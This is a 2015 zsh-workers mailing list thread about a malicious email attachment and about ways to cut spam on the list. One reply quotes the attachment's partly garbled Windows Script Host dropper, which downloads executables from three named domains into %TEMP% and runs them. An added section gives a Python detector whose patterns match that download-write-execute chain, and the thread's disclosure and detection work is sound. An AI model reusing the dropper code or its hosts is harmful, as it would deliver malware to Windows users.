zsh-workers
* zsh-workers/37266 has a malicious attachment
@ 2015-12-01 12:24 Peter Stephenson
  2015-12-01 13:13 ` Markus Trippelsdorf
  2015-12-01 18:11 ` Bart Schaefer
  0 siblings, 2 replies; 7+ messages in thread
From: Peter Stephenson @ 2015-12-01 12:24 UTC (permalink / raw)
  To: Zsh Hackers' List

...probably obvious enough to everyone here, but as it got flagged up by
our email system I thought it was worth reporting more widely.
Subject line is "Your e-ticket #0000228935".

pws



* Re: zsh-workers/37266 has a malicious attachment
  2015-12-01 12:24 zsh-workers/37266 has a malicious attachment Peter Stephenson
@ 2015-12-01 13:13 ` Markus Trippelsdorf
  2015-12-01 18:11 ` Bart Schaefer
  1 sibling, 0 replies; 7+ messages in thread
From: Markus Trippelsdorf @ 2015-12-01 13:13 UTC (permalink / raw)
  To: Peter Stephenson; +Cc: Zsh Hackers' List

On 2015.12.01 at 12:24 +0000, Peter Stephenson wrote:
> ...probably obvious enough to everyone here, but as it got flagged up by
> our email system I thought it was worth reporting more widely.
> Subject line is "Your e-ticket #0000228935".

Only Windows users are attacked. Here is the code:

var b = "itechgalaxyapps.com mybeautypedia.com kindernestmumbai.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "750083";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i 1000) {
        dn = 1;
        xa.position = 0;
        xa.saveToFile(fn + n + ".exe", 2);
        try {
            ws.Run(fn + n + ".exe", 1, 0);
        } catch (er) {};
    };
    xa.close();
};
if (dn == 1) {
    ld = i;
    break;
};
} catch (er) {};
};
};

-- 
Markus
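
Added example, not part of the original thread or of any list member's message: a static triage check for Windows Script Host attachments like the one quoted above. It flags the download / write-to-disk / execute combination and lists embedded hostnames in defanged form. The function name, both sample scripts and the `.example` hosts are constructed for illustration.

```python
import re

# Capability -> patterns that must all appear. The object and method names
# are the ones used by the script quoted in the message above.
CAPABILITIES = {
    "download": [r"MSXML2\.XMLHTTP"],
    "write_file": [r"ADODB\.Stream", r"\.saveToFile\s*\("],
    "execute": [r"WScript\.Shell", r"\.Run\s*\("],
}
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I)
FILE_EXT = (".exe", ".dll", ".scr", ".js")

def triage_wsh_script(source):
    """Statically classify a WSH JScript attachment; never executes it."""
    # Undo simple literal splitting such as "WScr" + "ipt.Shell".
    text = re.sub(r'''(["'])\s*\+\s*\1''', "", source)
    caps = sorted(c for c, pats in CAPABILITIES.items()
                  if all(re.search(p, text, re.I) for p in pats))
    # ProgIDs look like hostnames, so collect them and exclude them below.
    progids = {p.lower() for p in re.findall(
        r'''(?:CreateObject|ActiveXObject)\s*\(\s*["']([^"']+)["']''', text, re.I)}
    hosts = []
    for literal in re.findall(r'''["']([^"'\n]*)["']''', text):
        for tok in literal.lower().split():
            if (HOST_RE.fullmatch(tok) and tok not in progids
                    and not tok.endswith(FILE_EXT)):
                hosts.append(tok.replace(".", "[.]"))  # defang for reports
    writes_exe = bool(re.search(r'''saveToFile\s*\([^)]*\.exe["']''', text, re.I))
    verdict = {3: "dropper", 0: "no-match"}.get(len(caps), "review")
    return {"verdict": verdict, "capabilities": caps,
            "hosts": hosts, "writes_exe": writes_exe}

# Constructed, inert fragments (no request is ever made); placeholder hosts.
SAMPLE_DROPPER = r'''
var b = "files.example cdn.example".split(" ");
var ws = WScript.CreateObject("WScr" + "ipt.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "000000";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
xa.saveToFile(fn + "1.exe", 2);
ws.Run(fn + "1.exe", 1, 0);
'''
SAMPLE_BENIGN = r'''
var ws = WScript.CreateObject("WScript.Shell");
WScript.Echo(ws.ExpandEnvironmentStrings("%USERNAME%"));
'''

if __name__ == "__main__":
    print(triage_wsh_script(SAMPLE_DROPPER))
    print(triage_wsh_script(SAMPLE_BENIGN))
```

A "review" verdict means only some of the three capabilities were found; the check is a mail-gateway style heuristic, not a replacement for a scanner.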



* Re: zsh-workers/37266 has a malicious attachment
  2015-12-01 12:24 zsh-workers/37266 has a malicious attachment Peter Stephenson
  2015-12-01 13:13 ` Markus Trippelsdorf
@ 2015-12-01 18:11 ` Bart Schaefer
  2015-12-01 20:33   ` ZyX
  1 sibling, 1 reply; 7+ messages in thread
From: Bart Schaefer @ 2015-12-01 18:11 UTC (permalink / raw)
  To: Zsh Hackers' List; +Cc: Geoff Wing

On Dec 1, 12:24pm, Peter Stephenson wrote:
}
} ...probably obvious enough to everyone here, but as it got flagged up by
} our email system I thought it was worth reporting more widely.
} Subject line is "Your e-ticket #0000228935".

The number of spam/malicious messages making it to the list has been
slowly creeping up the last several months.  We may have to consider
closing zsh-workers to non-subscribers.

Curiously zsh-users doesn't seem to have the same problem (yet), so if
we can close -workers while still allowing the cross-posting, we won't
lose much.

Or maybe non-member posts could require approval, as with -announce.

-- 
Barton E. Schaefer



* Re: zsh-workers/37266 has a malicious attachment
  2015-12-01 18:11 ` Bart Schaefer
@ 2015-12-01 20:33   ` ZyX
  2015-12-02  0:21     ` Axel Beckert
  0 siblings, 1 reply; 7+ messages in thread
From: ZyX @ 2015-12-01 20:33 UTC (permalink / raw)
  To: Bart Schaefer, Zsh Hackers' List; +Cc: Geoff Wing

01.12.2015, 21:12, "Bart Schaefer" <schaefer@brasslantern.com>:
> On Dec 1, 12:24pm, Peter Stephenson wrote:
> }
> } ...probably obvious enough to everyone here, but as it got flagged up by
> } our email system I thought it was worth reporting more widely.
> } Subject line is "Your e-ticket #0000228935".
>
> The number of spam/malicious messages making it to the list has been
> slowly creeping up the last several months. We may have to consider
> closing zsh-workers to non-subscribers.
>
> Curiously zsh-users doesn't seem to have the same problem (yet), so if
> we can close -workers while still allowing the cross-posting, we won't
> lose much.
>
> Or maybe non-member posts could require approval, as with -announce.

vim* lists use Google Groups and moderation for new members and I almost never see spam there. Most likely though this is the result of the following combination:

1. Google anti-spam algorithms.
2. Requirement to have Google account to become a member (not necessarily Google mail though).
3. Denied non-member posting.
4. Presence of pre-moderation for all members that write posts for the first time.

Fourth should be the most effective. I mean, has the least number of false negatives and positives (“positive” is “spam” marker), though only as long as you do not consider denying non-member posts as adding false positives.

>
> --
> Barton E. Schaefer



* Re: zsh-workers/37266 has a malicious attachment
  2015-12-01 20:33   ` ZyX
@ 2015-12-02  0:21     ` Axel Beckert
  2015-12-02  0:35       ` Daniel Shahaf
  0 siblings, 1 reply; 7+ messages in thread
From: Axel Beckert @ 2015-12-02  0:21 UTC (permalink / raw)
  To: zsh-workers

Hi,

On Tue, Dec 01, 2015 at 11:33:19PM +0300, ZyX wrote:
> 01.12.2015, 21:12, "Bart Schaefer" <schaefer@brasslantern.com>:
> > On Dec 1, 12:24pm, Peter Stephenson wrote:
> > } ...probably obvious enough to everyone here, but as it got flagged up by
> > } our email system I thought it was worth reporting more widely.

Well, it got flagged as spam here, too. So IMHO the chances are rather
high that others' spam filters caught it, too. I actually don't care
about Spam on mailing lists. It's spam after all and gets filtered
here locally as direct spam, too.

> > The number of spam/malicious messages making it to the list has been
> > slowly creeping up the last several months. We may have to consider
> > closing zsh-workers to non-subscribers.

That would hinder bug reports a lot.

> > Or maybe non-member posts could require approval, as with
> > -announce.

That's much better.

> vim* lists use Google Groups and moderation for new members and I
> almost never see spam there.

Nevertheless using Google Groups as a mailing list has tons of other
issues. IMHO it's by far not worth to drop a proper and working ML for
crappy Google Groups. And you don't know how long they will exist.
Just think about Google Wave, Google Reader and all the other nice
services they already closed down.

Besides the nice X-Seq feature is surely not available on Google
Groups.

> 4. Presence of pre-moderation for all members that write posts for
> the first time.

That's also a viable solution IMHO.

		Kind regards, Axel
-- 
/~\  Plain Text Ribbon Campaign                   | Axel Beckert
\ /  Say No to HTML in E-Mail and News            | abe@deuxchevaux.org  (Mail)
 X   See http://www.nonhtmlmail.org/campaign.html | abe@noone.org (Mail+Jabber)
/ \  I love long mails: http://email.is-not-s.ms/ | http://abe.noone.org/ (Web)



* Re: zsh-workers/37266 has a malicious attachment
  2015-12-02  0:21     ` Axel Beckert
@ 2015-12-02  0:35       ` Daniel Shahaf
  2015-12-03 11:38         ` Vincent Lefevre
  0 siblings, 1 reply; 7+ messages in thread
From: Daniel Shahaf @ 2015-12-02  0:35 UTC (permalink / raw)
  To: zsh-workers

Axel Beckert wrote on Wed, Dec 02, 2015 at 01:21:20 +0100:
> On Tue, Dec 01, 2015 at 11:33:19PM +0300, ZyX wrote:
> > 01.12.2015, 21:12, "Bart Schaefer" <schaefer@brasslantern.com>:
> > > On Dec 1, 12:24pm, Peter Stephenson wrote:
> > > Or maybe non-member posts could require approval, as with
> > > -announce.
> 
> That's much better.
> 

Apache lists permit posts by non-subscribers but require the first post
by a non-subscribed address to be manually approved.  (Subsequent posts
do not require approval.)  I think I only ever saw one false negative
there.  The only effect to posters is a delay the first time they post.

They implement that policy through 'ezmlm-make -+ -m -u'.

> > vim* lists use Google Groups and moderation for new members and I
> > almost never see spam there.
> 
> Nevertheless using Google Groups as a mailing list has tons of other
> issues. IMHO it's by far not worth to drop a proper and working ML for
> crappy Google Groups. And you don't know how long they will exist.
> Just think about Google Wave, Google Reader and all the other nice
> services they already closed down.
> 
> Besides the nice X-Seq feature is surely not available on Google
> Groups.
> 

+1



* Re: zsh-workers/37266 has a malicious attachment
  2015-12-02  0:35       ` Daniel Shahaf
@ 2015-12-03 11:38         ` Vincent Lefevre
  0 siblings, 0 replies; 7+ messages in thread
From: Vincent Lefevre @ 2015-12-03 11:38 UTC (permalink / raw)
  To: zsh-workers

On 2015-12-02 00:35:18 +0000, Daniel Shahaf wrote:
> Apache lists permit posts by non-subscribers but require the first post
> by a non-subscribed address to be manually approved.  (Subsequent posts
> do not require approval.)  I think I only ever saw one false negative
> there.  The only effect to posters is a delay the first time they post.

Or, alternatively, how about a strong spam filter where members
would be whitelisted?

The spam filter could do:

  spam -> rejected
  maybe-spam -> moderated
  not-spam -> accepted

-- 
Vincent Lefèvre <vincent@vinc17.net> - Web: <https://www.vinc17.net/>
100% accessible validated (X)HTML - Blog: <https://www.vinc17.net/blog/>
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

